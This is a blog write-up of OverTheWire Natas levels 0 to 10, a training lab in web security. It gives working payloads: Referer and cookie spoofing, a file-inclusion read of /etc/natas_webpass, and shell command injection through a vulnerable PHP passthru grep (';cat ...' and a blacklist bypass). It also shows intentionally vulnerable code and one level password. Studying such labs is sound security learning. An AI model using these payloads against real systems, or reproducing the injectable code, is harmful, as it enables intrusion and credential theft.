Overthewire.org - Natas 1-10

Write-Up

Posted on December 25, 2016 as Overthewire. 7 minute read.

Introduction

Welcome back to another OverTheWire wargame, "Natas", which consists only of tasks connected to web security. As the number of exercises is very large (33 at the time of publishing this post), I will break the write-up into a few smaller parts. Without wasting your time, let's get started!

0

Firstly, we are greeted with this message:

You can find the password for the next level on this page.

As you may suspect, the password is hidden somewhere in the source code of the page. Let's take a look:

<div id="content">
You can find the password for the next level on this page.

<!--The password for natas1 is *********************** -->
</div>

There it is, commented out. Now let's jump into the next level.

1

This time we have more 'serious' protection going on.

You can find the password for the next level on this page, but rightclicking has been blocked!

One way to bypass this protection is to prefix the URL of the website with view-source: in the address bar.

<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!

<!--The password for natas2 is *********************** -->
</div>

2

This time, we have to look somewhere outside of the source code.

There is nothing on this page

The first thing that comes to mind is robots.txt; it sometimes contains very useful information. Unfortunately, it did not help this time. But there was something else that caught my attention.

<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>

What is this pixel.png? It's in a directory called files; maybe we'll find something more useful there.

Great, apart from pixel.png the directory contains users.txt with the password for the next level!

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:***********************
eve:zo4mJWyNj2
mallory:9urtcpzBmH

3

Once again:

There is nothing on this page

But!

This time we have a clue in robots.txt. I knew it would help at some point!

User-agent: *
Disallow: /s3cr3t/

Browsing to this directory lets us view another users.txt with the password for the next level.

natas4:***********************

4

Oh, something new!

Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"

It must be something to do with the HTTP Referer header; changing (spoofing) its value may allow me to enter.

After some quick googling I came up with a Chrome plugin, Referer Control. After changing the referer to the one given in the message and refreshing the page, I got the password for the next level.

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

5

But, how can I log in? :D

Access disallowed. You are not logged in

Actually, this level was very easy: using EditThisCookie I was able to change the value of the loggedin cookie from 0 to 1, which made the password visible.

Access granted. The password for natas6 is ***********************

6

This time we've got a simple form, with the ability to view its source code.

<?

include "includes/secret.inc";

if(array_key_exists("submit", $_POST)) {
    if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>

Actually, we don't have to analyze the whole code. What matters is the include line: since $secret is assigned nowhere in this file, I can assume it is set in secret.inc. Let's check it!

<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Now the last thing to do is to enter the secret into the form.

Great, it works!

Access granted. The password for natas7 is ***********************

7

In this level the website has a simple structure: clicking the elements in the menu changes the content of the page.

<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>
this is the about page

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>

Ok, we have a hint. Let's try to break this system and get access to /etc/natas_webpass/natas8.

Actually, I didn't have to break anything: simply entering index.php?page=/etc/natas_webpass/natas8 in the URL allowed me to view the file.

***********************

8

Another level, another form.

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
        print "Access granted. The password for natas9 is <censored>";
    } else {
        print "Wrong secret";
    }
}
?>

Let's break down this process: first the script takes the input entered in the form, then the function encodeSecret base64-encodes it, reverses the resulting string and converts it to hex. What we have to do here is reverse this process, step by step in the opposite order, which can be done with PHP.

$ php -r 'echo base64_decode(strrev(hex2bin("3d3d516343746d4d6d6c315669563362")));'

This one-liner produces the correct secret, which after entering into the form gives the password to the next level.

Access granted. The password for natas9 is ***********************
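The same round trip in Python, as an added example that is not part of the original post: encode_secret mirrors the three steps of the level's PHP encodeSecret(), and decode_secret undoes them in reverse order, which is all that is needed because the secret is merely encoded, not hashed.

```python
import base64

# Constant copied from the level 8 source above.
ENCODED_SECRET = "3d3d516343746d4d6d6c315669563362"


def encode_secret(secret: str) -> str:
    """Same three steps as the PHP encodeSecret(): base64_encode, strrev, bin2hex."""
    b64 = base64.b64encode(secret.encode()).decode()  # base64_encode
    reversed_b64 = b64[::-1]                          # strrev
    return reversed_b64.encode().hex()                # bin2hex


def decode_secret(encoded: str) -> str:
    """Invert encode_secret: every step is reversible, so apply the inverses backwards."""
    reversed_b64 = bytes.fromhex(encoded).decode()    # hex2bin
    b64 = reversed_b64[::-1]                          # strrev
    return base64.b64decode(b64).decode()             # base64_decode


if __name__ == "__main__":
    secret = decode_secret(ENCODED_SECRET)
    # Re-encoding the recovered value must reproduce the constant from the source.
    assert encode_secret(secret) == ENCODED_SECRET
    print(secret)
```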

9

This time we have something new: a form that searches a dictionary. Let's check the source code.

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>

What this script does is actually very dangerous. We know that grep is a command line tool that searches through text files. But what if we enter a semicolon followed by another command? You can see it working by entering ;ls -la in the search form.

-rw-r----- 1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

Great, let's view the password by entering ;cat /etc/natas_webpass/natas10/, as that directory is where all the passwords are stored, which the hint in level 7 already told us.

Output:
***********************

African
Africans
Allah
Allah's

Let's move to the next one!

10

This time we have an updated version of the script from the last level, filtering out certain characters.

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>

We have to find a way to execute our command differently. After learning a lot about PHP I remembered that . concatenates two strings, so let's try this: . /etc/natas_webpass/natas11. Looking at the output below, what really happens is on the shell side: the filter only rejects ; | &, so grep receives . as its pattern (which matches any character, hence every line) and /etc/natas_webpass/natas11 as an extra file to search, which is why each line of output is prefixed with a file name.

This actually produces the output! I also tried doing this with HTML entities first, but unfortunately that did not work.

/etc/natas_webpass/natas11:***********************
dictionary.txt:African
dictionary.txt:Africans
dictionary.txt:Allah
dictionary.txt:Allah's
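To make the lesson from levels 9 and 10 concrete, here is an added example (not code from the original post) that mimics the page's PHP on the Python side: level10_argv applies the same [;|&] blacklist and then shows how the shell would tokenise the spliced-in needle, while safe_grep_argv is the hardened form that never goes through a shell at all, so the needle stays a single argument whatever it contains. The file name dictionary.txt is taken from the page; the function names are my own.

```python
import re
import shlex
import subprocess

DICTIONARY = "dictionary.txt"
ILLEGAL = re.compile(r"[;|&]")  # the level 10 blacklist from the page


def level10_argv(needle: str):
    """Return (rejected, argv) for the page's PHP approach.

    passthru("grep -i $key dictionary.txt") hands one string to /bin/sh;
    shlex.split() shows the argument vector sh would build from it.
    Level 9 is the same code with no blacklist at all.
    """
    if ILLEGAL.search(needle):
        return True, []
    return False, shlex.split(f"grep -i {needle} {DICTIONARY}")


def safe_grep_argv(needle: str):
    """Hardened form: build argv directly, no shell, and end option parsing with --.

    The user's text can never become a second file or an extra flag because it
    occupies exactly one argv slot; escapeshellarg() is the PHP equivalent.
    """
    return ["grep", "-i", "--", needle, DICTIONARY]


def safe_grep(needle: str) -> str:
    """Run the hardened command without a shell and return its stdout."""
    result = subprocess.run(safe_grep_argv(needle), capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    # Constructed inputs taken from the write-up above.
    print(level10_argv(";ls -la"))                    # rejected by the blacklist
    print(level10_argv(". /etc/natas_webpass/natas11"))  # path becomes a 2nd file
    print(safe_grep_argv(". /etc/natas_webpass/natas11"))  # one opaque argument
```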

And that's the point where I had to end this part of the Natas exercises. I'll come back soon with another part, as they are really interesting and completely different from the other OverTheWire wargames.

See you in the next one!

Keep learning and stay safe!

~ W3ndige